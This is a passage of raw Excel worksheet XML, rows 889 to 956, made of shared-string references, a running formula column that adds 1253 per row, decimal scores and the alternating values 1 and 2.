      </c>
      <c r="D889" t="s">
        <v>1721</v>
      </c>
      <c r="E889">
        <v>23.357730865478519</v>
      </c>
      <c r="F889">
        <v>1</v>
      </c>
    </row>
    <row r="890" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A890" t="s">
        <v>1719</v>
      </c>
      <c r="B890" t="s">
        <v>1720</v>
      </c>
      <c r="C890">
        <f t="shared" si="13"/>
        <v>10544105</v>
      </c>
      <c r="D890" t="s">
        <v>1722</v>
      </c>
      <c r="E890">
        <v>7.8565483093261719</v>
      </c>
      <c r="F890">
        <v>2</v>
      </c>
    </row>
    <row r="891" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A891" t="s">
        <v>1723</v>
      </c>
      <c r="B891" t="s">
        <v>1724</v>
      </c>
      <c r="C891">
        <f t="shared" si="13"/>
        <v>10545358</v>
      </c>
      <c r="D891" t="s">
        <v>1725</v>
      </c>
      <c r="E891">
        <v>32.843833923339837</v>
      </c>
      <c r="F891">
        <v>1</v>
      </c>
    </row>
    <row r="892" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A892" t="s">
        <v>1723</v>
      </c>
      <c r="B892" t="s">
        <v>1724</v>
      </c>
      <c r="C892">
        <f t="shared" si="13"/>
        <v>10546611</v>
      </c>
      <c r="D892" t="s">
        <v>1726</v>
      </c>
      <c r="E892">
        <v>7.9689372796565294E-4</v>
      </c>
      <c r="F892">
        <v>2</v>
      </c>
    </row>
    <row r="893" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A893" t="s">
        <v>1727</v>
      </c>
      <c r="B893" t="s">
        <v>1728</v>
      </c>
      <c r="C893">
        <f t="shared" si="13"/>
        <v>10547864</v>
      </c>
      <c r="D893" t="s">
        <v>1729</v>
      </c>
      <c r="E893">
        <v>27.253458023071289</v>
      </c>
      <c r="F893">
        <v>1</v>
      </c>
    </row>
    <row r="894" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A894" t="s">
        <v>1727</v>
      </c>
      <c r="B894" t="s">
        <v>1728</v>
      </c>
      <c r="C894">
        <f t="shared" si="13"/>
        <v>10549117</v>
      </c>
      <c r="D894" t="s">
        <v>1730</v>
      </c>
      <c r="E894">
        <v>13.09749794006348</v>
      </c>
      <c r="F894">
        <v>2</v>
      </c>
    </row>
    <row r="895" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A895" t="s">
        <v>1731</v>
      </c>
      <c r="B895" t="s">
        <v>1732</v>
      </c>
      <c r="C895">
        <f t="shared" si="13"/>
        <v>10550370</v>
      </c>
      <c r="D895" t="s">
        <v>1733</v>
      </c>
      <c r="E895">
        <v>36.961620330810547</v>
      </c>
      <c r="F895">
        <v>1</v>
      </c>
    </row>
    <row r="896" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A896" t="s">
        <v>1731</v>
      </c>
      <c r="B896" t="s">
        <v>1732</v>
      </c>
      <c r="C896">
        <f t="shared" si="13"/>
        <v>10551623</v>
      </c>
      <c r="D896" t="s">
        <v>1734</v>
      </c>
      <c r="E896">
        <v>0.74550372362136841</v>
      </c>
      <c r="F896">
        <v>2</v>
      </c>
    </row>
    <row r="897" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A897" t="s">
        <v>1735</v>
      </c>
      <c r="B897" t="s">
        <v>1736</v>
      </c>
      <c r="C897">
        <f t="shared" si="13"/>
        <v>10552876</v>
      </c>
      <c r="D897" t="s">
        <v>1737</v>
      </c>
      <c r="E897">
        <v>24.41732215881348</v>
      </c>
      <c r="F897">
        <v>1</v>
      </c>
    </row>
    <row r="898" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A898" t="s">
        <v>1735</v>
      </c>
      <c r="B898" t="s">
        <v>1736</v>
      </c>
      <c r="C898">
        <f t="shared" si="13"/>
        <v>10554129</v>
      </c>
      <c r="D898" t="s">
        <v>1738</v>
      </c>
      <c r="E898">
        <v>5.5930061340332031</v>
      </c>
      <c r="F898">
        <v>2</v>
      </c>
    </row>
    <row r="899" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A899" t="s">
        <v>1739</v>
      </c>
      <c r="B899" t="s">
        <v>1740</v>
      </c>
      <c r="C899">
        <f t="shared" si="13"/>
        <v>10555382</v>
      </c>
      <c r="D899" t="s">
        <v>1741</v>
      </c>
      <c r="E899">
        <v>23.745918273925781</v>
      </c>
      <c r="F899">
        <v>1</v>
      </c>
    </row>
    <row r="900" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A900" t="s">
        <v>1739</v>
      </c>
      <c r="B900" t="s">
        <v>1740</v>
      </c>
      <c r="C900">
        <f t="shared" si="13"/>
        <v>10556635</v>
      </c>
      <c r="D900" t="s">
        <v>1742</v>
      </c>
      <c r="E900">
        <v>7.2240734100341797</v>
      </c>
      <c r="F900">
        <v>2</v>
      </c>
    </row>
    <row r="901" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A901" t="s">
        <v>1743</v>
      </c>
      <c r="B901" t="s">
        <v>1744</v>
      </c>
      <c r="C901">
        <f t="shared" si="13"/>
        <v>10557888</v>
      </c>
      <c r="D901" t="s">
        <v>1745</v>
      </c>
      <c r="E901">
        <v>22.294626235961911</v>
      </c>
      <c r="F901">
        <v>1</v>
      </c>
    </row>
    <row r="902" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A902" t="s">
        <v>1743</v>
      </c>
      <c r="B902" t="s">
        <v>1744</v>
      </c>
      <c r="C902">
        <f t="shared" si="13"/>
        <v>10559141</v>
      </c>
      <c r="D902" t="s">
        <v>1746</v>
      </c>
      <c r="E902">
        <v>14.341593742370611</v>
      </c>
      <c r="F902">
        <v>2</v>
      </c>
    </row>
    <row r="903" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A903" t="s">
        <v>1747</v>
      </c>
      <c r="B903" t="s">
        <v>1748</v>
      </c>
      <c r="C903">
        <f t="shared" si="13"/>
        <v>10560394</v>
      </c>
      <c r="D903" t="s">
        <v>1749</v>
      </c>
      <c r="E903">
        <v>23.452962875366211</v>
      </c>
      <c r="F903">
        <v>1</v>
      </c>
    </row>
    <row r="904" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A904" t="s">
        <v>1747</v>
      </c>
      <c r="B904" t="s">
        <v>1748</v>
      </c>
      <c r="C904">
        <f t="shared" si="13"/>
        <v>10561647</v>
      </c>
      <c r="D904" t="s">
        <v>1750</v>
      </c>
      <c r="E904">
        <v>12.357301712036129</v>
      </c>
      <c r="F904">
        <v>2</v>
      </c>
    </row>
    <row r="905" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A905" t="s">
        <v>1751</v>
      </c>
      <c r="B905" t="s">
        <v>801</v>
      </c>
      <c r="C905">
        <f t="shared" si="13"/>
        <v>10562900</v>
      </c>
      <c r="D905" t="s">
        <v>802</v>
      </c>
      <c r="E905">
        <v>27.786935806274411</v>
      </c>
      <c r="F905">
        <v>1</v>
      </c>
    </row>
    <row r="906" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A906" t="s">
        <v>1751</v>
      </c>
      <c r="B906" t="s">
        <v>801</v>
      </c>
      <c r="C906">
        <f t="shared" ref="C906:C969" si="14">C905+1253</f>
        <v>10564153</v>
      </c>
      <c r="D906" t="s">
        <v>1752</v>
      </c>
      <c r="E906">
        <v>11.426968574523929</v>
      </c>
      <c r="F906">
        <v>2</v>
      </c>
    </row>
    <row r="907" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A907" t="s">
        <v>1753</v>
      </c>
      <c r="B907" t="s">
        <v>1754</v>
      </c>
      <c r="C907">
        <f t="shared" si="14"/>
        <v>10565406</v>
      </c>
      <c r="D907" t="s">
        <v>1755</v>
      </c>
      <c r="E907">
        <v>29.249223709106449</v>
      </c>
      <c r="F907">
        <v>1</v>
      </c>
    </row>
    <row r="908" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A908" t="s">
        <v>1753</v>
      </c>
      <c r="B908" t="s">
        <v>1754</v>
      </c>
      <c r="C908">
        <f t="shared" si="14"/>
        <v>10566659</v>
      </c>
      <c r="D908" t="s">
        <v>1756</v>
      </c>
      <c r="E908">
        <v>2.3311688899993901</v>
      </c>
      <c r="F908">
        <v>2</v>
      </c>
    </row>
    <row r="909" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A909" t="s">
        <v>1757</v>
      </c>
      <c r="B909" t="s">
        <v>1758</v>
      </c>
      <c r="C909">
        <f t="shared" si="14"/>
        <v>10567912</v>
      </c>
      <c r="D909" t="s">
        <v>1759</v>
      </c>
      <c r="E909">
        <v>22.344058990478519</v>
      </c>
      <c r="F909">
        <v>1</v>
      </c>
    </row>
    <row r="910" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A910" t="s">
        <v>1757</v>
      </c>
      <c r="B910" t="s">
        <v>1758</v>
      </c>
      <c r="C910">
        <f t="shared" si="14"/>
        <v>10569165</v>
      </c>
      <c r="D910" t="s">
        <v>1760</v>
      </c>
      <c r="E910">
        <v>5.3588341921567917E-2</v>
      </c>
      <c r="F910">
        <v>2</v>
      </c>
    </row>
    <row r="911" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A911" t="s">
        <v>1761</v>
      </c>
      <c r="B911" t="s">
        <v>923</v>
      </c>
      <c r="C911">
        <f t="shared" si="14"/>
        <v>10570418</v>
      </c>
      <c r="D911" t="s">
        <v>924</v>
      </c>
      <c r="E911">
        <v>36.254344940185547</v>
      </c>
      <c r="F911">
        <v>1</v>
      </c>
    </row>
    <row r="912" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A912" t="s">
        <v>1761</v>
      </c>
      <c r="B912" t="s">
        <v>923</v>
      </c>
      <c r="C912">
        <f t="shared" si="14"/>
        <v>10571671</v>
      </c>
      <c r="D912" t="s">
        <v>1762</v>
      </c>
      <c r="E912">
        <v>11.194798469543461</v>
      </c>
      <c r="F912">
        <v>2</v>
      </c>
    </row>
    <row r="913" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A913" t="s">
        <v>1763</v>
      </c>
      <c r="B913" t="s">
        <v>1764</v>
      </c>
      <c r="C913">
        <f t="shared" si="14"/>
        <v>10572924</v>
      </c>
      <c r="D913" t="s">
        <v>1765</v>
      </c>
      <c r="E913">
        <v>25.688720703125</v>
      </c>
      <c r="F913">
        <v>1</v>
      </c>
    </row>
    <row r="914" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A914" t="s">
        <v>1763</v>
      </c>
      <c r="B914" t="s">
        <v>1764</v>
      </c>
      <c r="C914">
        <f t="shared" si="14"/>
        <v>10574177</v>
      </c>
      <c r="D914" t="s">
        <v>1766</v>
      </c>
      <c r="E914">
        <v>8.7611427307128906</v>
      </c>
      <c r="F914">
        <v>2</v>
      </c>
    </row>
    <row r="915" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A915" t="s">
        <v>1767</v>
      </c>
      <c r="B915" t="s">
        <v>1768</v>
      </c>
      <c r="C915">
        <f t="shared" si="14"/>
        <v>10575430</v>
      </c>
      <c r="D915" t="s">
        <v>1769</v>
      </c>
      <c r="E915">
        <v>30.642087936401371</v>
      </c>
      <c r="F915">
        <v>1</v>
      </c>
    </row>
    <row r="916" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A916" t="s">
        <v>1767</v>
      </c>
      <c r="B916" t="s">
        <v>1768</v>
      </c>
      <c r="C916">
        <f t="shared" si="14"/>
        <v>10576683</v>
      </c>
      <c r="D916" t="s">
        <v>1770</v>
      </c>
      <c r="E916">
        <v>16.77170372009277</v>
      </c>
      <c r="F916">
        <v>2</v>
      </c>
    </row>
    <row r="917" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A917" t="s">
        <v>1771</v>
      </c>
      <c r="B917" t="s">
        <v>1772</v>
      </c>
      <c r="C917">
        <f t="shared" si="14"/>
        <v>10577936</v>
      </c>
      <c r="D917" t="s">
        <v>1773</v>
      </c>
      <c r="E917">
        <v>30.8461799621582</v>
      </c>
      <c r="F917">
        <v>1</v>
      </c>
    </row>
    <row r="918" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A918" t="s">
        <v>1771</v>
      </c>
      <c r="B918" t="s">
        <v>1772</v>
      </c>
      <c r="C918">
        <f t="shared" si="14"/>
        <v>10579189</v>
      </c>
      <c r="D918" t="s">
        <v>1774</v>
      </c>
      <c r="E918">
        <v>5.6392364501953116</v>
      </c>
      <c r="F918">
        <v>2</v>
      </c>
    </row>
    <row r="919" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A919" t="s">
        <v>1775</v>
      </c>
      <c r="B919" t="s">
        <v>1776</v>
      </c>
      <c r="C919">
        <f t="shared" si="14"/>
        <v>10580442</v>
      </c>
      <c r="D919" t="s">
        <v>1777</v>
      </c>
      <c r="E919">
        <v>28.019708633422852</v>
      </c>
      <c r="F919">
        <v>1</v>
      </c>
    </row>
    <row r="920" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A920" t="s">
        <v>1775</v>
      </c>
      <c r="B920" t="s">
        <v>1776</v>
      </c>
      <c r="C920">
        <f t="shared" si="14"/>
        <v>10581695</v>
      </c>
      <c r="D920" t="s">
        <v>1778</v>
      </c>
      <c r="E920">
        <v>7.0354633331298828</v>
      </c>
      <c r="F920">
        <v>2</v>
      </c>
    </row>
    <row r="921" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A921" t="s">
        <v>1779</v>
      </c>
      <c r="B921" t="s">
        <v>1780</v>
      </c>
      <c r="C921">
        <f t="shared" si="14"/>
        <v>10582948</v>
      </c>
      <c r="D921" t="s">
        <v>1781</v>
      </c>
      <c r="E921">
        <v>28.861812591552731</v>
      </c>
      <c r="F921">
        <v>1</v>
      </c>
    </row>
    <row r="922" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A922" t="s">
        <v>1779</v>
      </c>
      <c r="B922" t="s">
        <v>1780</v>
      </c>
      <c r="C922">
        <f t="shared" si="14"/>
        <v>10584201</v>
      </c>
      <c r="D922" t="s">
        <v>1782</v>
      </c>
      <c r="E922">
        <v>9.6407546997070313</v>
      </c>
      <c r="F922">
        <v>2</v>
      </c>
    </row>
    <row r="923" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A923" t="s">
        <v>1783</v>
      </c>
      <c r="B923" t="s">
        <v>1784</v>
      </c>
      <c r="C923">
        <f t="shared" si="14"/>
        <v>10585454</v>
      </c>
      <c r="D923" t="s">
        <v>1785</v>
      </c>
      <c r="E923">
        <v>30.36784553527832</v>
      </c>
      <c r="F923">
        <v>1</v>
      </c>
    </row>
    <row r="924" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A924" t="s">
        <v>1783</v>
      </c>
      <c r="B924" t="s">
        <v>1784</v>
      </c>
      <c r="C924">
        <f t="shared" si="14"/>
        <v>10586707</v>
      </c>
      <c r="D924" t="s">
        <v>1786</v>
      </c>
      <c r="E924">
        <v>0.1755009591579437</v>
      </c>
      <c r="F924">
        <v>2</v>
      </c>
    </row>
    <row r="925" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A925" t="s">
        <v>1787</v>
      </c>
      <c r="B925" t="s">
        <v>1788</v>
      </c>
      <c r="C925">
        <f t="shared" si="14"/>
        <v>10587960</v>
      </c>
      <c r="D925" t="s">
        <v>1789</v>
      </c>
      <c r="E925">
        <v>30.453481674194339</v>
      </c>
      <c r="F925">
        <v>1</v>
      </c>
    </row>
    <row r="926" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A926" t="s">
        <v>1787</v>
      </c>
      <c r="B926" t="s">
        <v>1788</v>
      </c>
      <c r="C926">
        <f t="shared" si="14"/>
        <v>10589213</v>
      </c>
      <c r="D926" t="s">
        <v>1790</v>
      </c>
      <c r="E926">
        <v>16.02495002746582</v>
      </c>
      <c r="F926">
        <v>2</v>
      </c>
    </row>
    <row r="927" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A927" t="s">
        <v>1791</v>
      </c>
      <c r="B927" t="s">
        <v>1792</v>
      </c>
      <c r="C927">
        <f t="shared" si="14"/>
        <v>10590466</v>
      </c>
      <c r="D927" t="s">
        <v>1793</v>
      </c>
      <c r="E927">
        <v>25.49652099609375</v>
      </c>
      <c r="F927">
        <v>1</v>
      </c>
    </row>
    <row r="928" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A928" t="s">
        <v>1791</v>
      </c>
      <c r="B928" t="s">
        <v>1792</v>
      </c>
      <c r="C928">
        <f t="shared" si="14"/>
        <v>10591719</v>
      </c>
      <c r="D928" t="s">
        <v>1794</v>
      </c>
      <c r="E928">
        <v>2.174299210309982E-2</v>
      </c>
      <c r="F928">
        <v>2</v>
      </c>
    </row>
    <row r="929" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A929" t="s">
        <v>1795</v>
      </c>
      <c r="B929" t="s">
        <v>719</v>
      </c>
      <c r="C929">
        <f t="shared" si="14"/>
        <v>10592972</v>
      </c>
      <c r="D929" t="s">
        <v>720</v>
      </c>
      <c r="E929">
        <v>24.2786750793457</v>
      </c>
      <c r="F929">
        <v>1</v>
      </c>
    </row>
    <row r="930" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A930" t="s">
        <v>1795</v>
      </c>
      <c r="B930" t="s">
        <v>719</v>
      </c>
      <c r="C930">
        <f t="shared" si="14"/>
        <v>10594225</v>
      </c>
      <c r="D930" t="s">
        <v>1796</v>
      </c>
      <c r="E930">
        <v>4.5249004364013672</v>
      </c>
      <c r="F930">
        <v>2</v>
      </c>
    </row>
    <row r="931" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A931" t="s">
        <v>1797</v>
      </c>
      <c r="B931" t="s">
        <v>1798</v>
      </c>
      <c r="C931">
        <f t="shared" si="14"/>
        <v>10595478</v>
      </c>
      <c r="D931" t="s">
        <v>724</v>
      </c>
      <c r="E931">
        <v>22.787782669067379</v>
      </c>
      <c r="F931">
        <v>1</v>
      </c>
    </row>
    <row r="932" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A932" t="s">
        <v>1797</v>
      </c>
      <c r="B932" t="s">
        <v>1798</v>
      </c>
      <c r="C932">
        <f t="shared" si="14"/>
        <v>10596731</v>
      </c>
      <c r="D932" t="s">
        <v>1799</v>
      </c>
      <c r="E932">
        <v>11.5300407409668</v>
      </c>
      <c r="F932">
        <v>2</v>
      </c>
    </row>
    <row r="933" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A933" t="s">
        <v>1800</v>
      </c>
      <c r="B933" t="s">
        <v>1801</v>
      </c>
      <c r="C933">
        <f t="shared" si="14"/>
        <v>10597984</v>
      </c>
      <c r="D933" t="s">
        <v>1529</v>
      </c>
      <c r="E933">
        <v>21.898868560791019</v>
      </c>
      <c r="F933">
        <v>1</v>
      </c>
    </row>
    <row r="934" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A934" t="s">
        <v>1800</v>
      </c>
      <c r="B934" t="s">
        <v>1801</v>
      </c>
      <c r="C934">
        <f t="shared" si="14"/>
        <v>10599237</v>
      </c>
      <c r="D934" t="s">
        <v>1802</v>
      </c>
      <c r="E934">
        <v>2.638554573059082</v>
      </c>
      <c r="F934">
        <v>2</v>
      </c>
    </row>
    <row r="935" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A935" t="s">
        <v>1803</v>
      </c>
      <c r="B935" t="s">
        <v>1804</v>
      </c>
      <c r="C935">
        <f t="shared" si="14"/>
        <v>10600490</v>
      </c>
      <c r="D935" t="s">
        <v>1805</v>
      </c>
      <c r="E935">
        <v>23.996419906616211</v>
      </c>
      <c r="F935">
        <v>1</v>
      </c>
    </row>
    <row r="936" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A936" t="s">
        <v>1803</v>
      </c>
      <c r="B936" t="s">
        <v>1804</v>
      </c>
      <c r="C936">
        <f t="shared" si="14"/>
        <v>10601743</v>
      </c>
      <c r="D936" t="s">
        <v>1806</v>
      </c>
      <c r="E936">
        <v>17.259279251098629</v>
      </c>
      <c r="F936">
        <v>2</v>
      </c>
    </row>
    <row r="937" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A937" t="s">
        <v>1807</v>
      </c>
      <c r="B937" t="s">
        <v>1808</v>
      </c>
      <c r="C937">
        <f t="shared" si="14"/>
        <v>10602996</v>
      </c>
      <c r="D937" t="s">
        <v>1809</v>
      </c>
      <c r="E937">
        <v>33.27069091796875</v>
      </c>
      <c r="F937">
        <v>1</v>
      </c>
    </row>
    <row r="938" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A938" t="s">
        <v>1807</v>
      </c>
      <c r="B938" t="s">
        <v>1808</v>
      </c>
      <c r="C938">
        <f t="shared" si="14"/>
        <v>10604249</v>
      </c>
      <c r="D938" t="s">
        <v>1810</v>
      </c>
      <c r="E938">
        <v>8.5605010986328125</v>
      </c>
      <c r="F938">
        <v>2</v>
      </c>
    </row>
    <row r="939" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A939" t="s">
        <v>1811</v>
      </c>
      <c r="B939" t="s">
        <v>1812</v>
      </c>
      <c r="C939">
        <f t="shared" si="14"/>
        <v>10605502</v>
      </c>
      <c r="D939" t="s">
        <v>1813</v>
      </c>
      <c r="E939">
        <v>29.691122055053711</v>
      </c>
      <c r="F939">
        <v>1</v>
      </c>
    </row>
    <row r="940" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A940" t="s">
        <v>1811</v>
      </c>
      <c r="B940" t="s">
        <v>1812</v>
      </c>
      <c r="C940">
        <f t="shared" si="14"/>
        <v>10606755</v>
      </c>
      <c r="D940" t="s">
        <v>1814</v>
      </c>
      <c r="E940">
        <v>6.0692877013934783E-5</v>
      </c>
      <c r="F940">
        <v>2</v>
      </c>
    </row>
    <row r="941" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A941" t="s">
        <v>1815</v>
      </c>
      <c r="B941" t="s">
        <v>1816</v>
      </c>
      <c r="C941">
        <f t="shared" si="14"/>
        <v>10608008</v>
      </c>
      <c r="D941" t="s">
        <v>1817</v>
      </c>
      <c r="E941">
        <v>26.9182243347168</v>
      </c>
      <c r="F941">
        <v>1</v>
      </c>
    </row>
    <row r="942" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A942" t="s">
        <v>1815</v>
      </c>
      <c r="B942" t="s">
        <v>1816</v>
      </c>
      <c r="C942">
        <f t="shared" si="14"/>
        <v>10609261</v>
      </c>
      <c r="D942" t="s">
        <v>1818</v>
      </c>
      <c r="E942">
        <v>16.9190673828125</v>
      </c>
      <c r="F942">
        <v>2</v>
      </c>
    </row>
    <row r="943" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A943" t="s">
        <v>1819</v>
      </c>
      <c r="B943" t="s">
        <v>1820</v>
      </c>
      <c r="C943">
        <f t="shared" si="14"/>
        <v>10610514</v>
      </c>
      <c r="D943" t="s">
        <v>1821</v>
      </c>
      <c r="E943">
        <v>28.855903625488281</v>
      </c>
      <c r="F943">
        <v>1</v>
      </c>
    </row>
    <row r="944" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A944" t="s">
        <v>1819</v>
      </c>
      <c r="B944" t="s">
        <v>1820</v>
      </c>
      <c r="C944">
        <f t="shared" si="14"/>
        <v>10611767</v>
      </c>
      <c r="D944" t="s">
        <v>1822</v>
      </c>
      <c r="E944">
        <v>5.1384468078613281</v>
      </c>
      <c r="F944">
        <v>2</v>
      </c>
    </row>
    <row r="945" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A945" t="s">
        <v>1823</v>
      </c>
      <c r="B945" t="s">
        <v>1824</v>
      </c>
      <c r="C945">
        <f t="shared" si="14"/>
        <v>10613020</v>
      </c>
      <c r="D945" t="s">
        <v>1506</v>
      </c>
      <c r="E945">
        <v>28.631402969360352</v>
      </c>
      <c r="F945">
        <v>1</v>
      </c>
    </row>
    <row r="946" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A946" t="s">
        <v>1823</v>
      </c>
      <c r="B946" t="s">
        <v>1824</v>
      </c>
      <c r="C946">
        <f t="shared" si="14"/>
        <v>10614273</v>
      </c>
      <c r="D946" t="s">
        <v>1825</v>
      </c>
      <c r="E946">
        <v>14.099545478820801</v>
      </c>
      <c r="F946">
        <v>2</v>
      </c>
    </row>
    <row r="947" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A947" t="s">
        <v>1826</v>
      </c>
      <c r="B947" t="s">
        <v>1827</v>
      </c>
      <c r="C947">
        <f t="shared" si="14"/>
        <v>10615526</v>
      </c>
      <c r="D947" t="s">
        <v>1828</v>
      </c>
      <c r="E947">
        <v>16.801700592041019</v>
      </c>
      <c r="F947">
        <v>1</v>
      </c>
    </row>
    <row r="948" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A948" t="s">
        <v>1826</v>
      </c>
      <c r="B948" t="s">
        <v>1827</v>
      </c>
      <c r="C948">
        <f t="shared" si="14"/>
        <v>10616779</v>
      </c>
      <c r="D948" t="s">
        <v>1829</v>
      </c>
      <c r="E948">
        <v>11.15080547332764</v>
      </c>
      <c r="F948">
        <v>2</v>
      </c>
    </row>
    <row r="949" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A949" t="s">
        <v>1830</v>
      </c>
      <c r="B949" t="s">
        <v>1831</v>
      </c>
      <c r="C949">
        <f t="shared" si="14"/>
        <v>10618032</v>
      </c>
      <c r="D949" t="s">
        <v>1832</v>
      </c>
      <c r="E949">
        <v>35.582508087158203</v>
      </c>
      <c r="F949">
        <v>1</v>
      </c>
    </row>
    <row r="950" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A950" t="s">
        <v>1830</v>
      </c>
      <c r="B950" t="s">
        <v>1831</v>
      </c>
      <c r="C950">
        <f t="shared" si="14"/>
        <v>10619285</v>
      </c>
      <c r="D950" t="s">
        <v>1833</v>
      </c>
      <c r="E950">
        <v>8.9968368411064148E-3</v>
      </c>
      <c r="F950">
        <v>2</v>
      </c>
    </row>
    <row r="951" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A951" t="s">
        <v>1834</v>
      </c>
      <c r="B951" t="s">
        <v>1835</v>
      </c>
      <c r="C951">
        <f t="shared" si="14"/>
        <v>10620538</v>
      </c>
      <c r="D951" t="s">
        <v>1836</v>
      </c>
      <c r="E951">
        <v>27.573394775390621</v>
      </c>
      <c r="F951">
        <v>1</v>
      </c>
    </row>
    <row r="952" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A952" t="s">
        <v>1834</v>
      </c>
      <c r="B952" t="s">
        <v>1835</v>
      </c>
      <c r="C952">
        <f t="shared" si="14"/>
        <v>10621791</v>
      </c>
      <c r="D952" t="s">
        <v>1837</v>
      </c>
      <c r="E952">
        <v>9.0555038452148438</v>
      </c>
      <c r="F952">
        <v>2</v>
      </c>
    </row>
    <row r="953" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A953" t="s">
        <v>1838</v>
      </c>
      <c r="B953" t="s">
        <v>1839</v>
      </c>
      <c r="C953">
        <f t="shared" si="14"/>
        <v>10623044</v>
      </c>
      <c r="D953" t="s">
        <v>1840</v>
      </c>
      <c r="E953">
        <v>25.767007827758789</v>
      </c>
      <c r="F953">
        <v>1</v>
      </c>
    </row>
    <row r="954" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A954" t="s">
        <v>1838</v>
      </c>
      <c r="B954" t="s">
        <v>1839</v>
      </c>
      <c r="C954">
        <f t="shared" si="14"/>
        <v>10624297</v>
      </c>
      <c r="D954" t="s">
        <v>1841</v>
      </c>
      <c r="E954">
        <v>0.59640228748321533</v>
      </c>
      <c r="F954">
        <v>2</v>
      </c>
    </row>
    <row r="955" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A955" t="s">
        <v>1842</v>
      </c>
      <c r="B955" t="s">
        <v>1843</v>
      </c>
      <c r="C955">
        <f t="shared" si="14"/>
        <v>10625550</v>
      </c>
      <c r="D955" t="s">
        <v>1844</v>
      </c>
      <c r="E955">
        <v>30.425544738769531</v>
      </c>
      <c r="F955">
        <v>1</v>
      </c>
    </row>
    <row r="956" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A956" t="s">
        <v>1842</v>
      </c>
      <c r="B956" t="s">
        <v>1843</v>
      </c>
      <c r="C956">
        <f t="shared" si="14"/>
        <v>10626803</v>
      </c>
      <c r="D956" t="s">
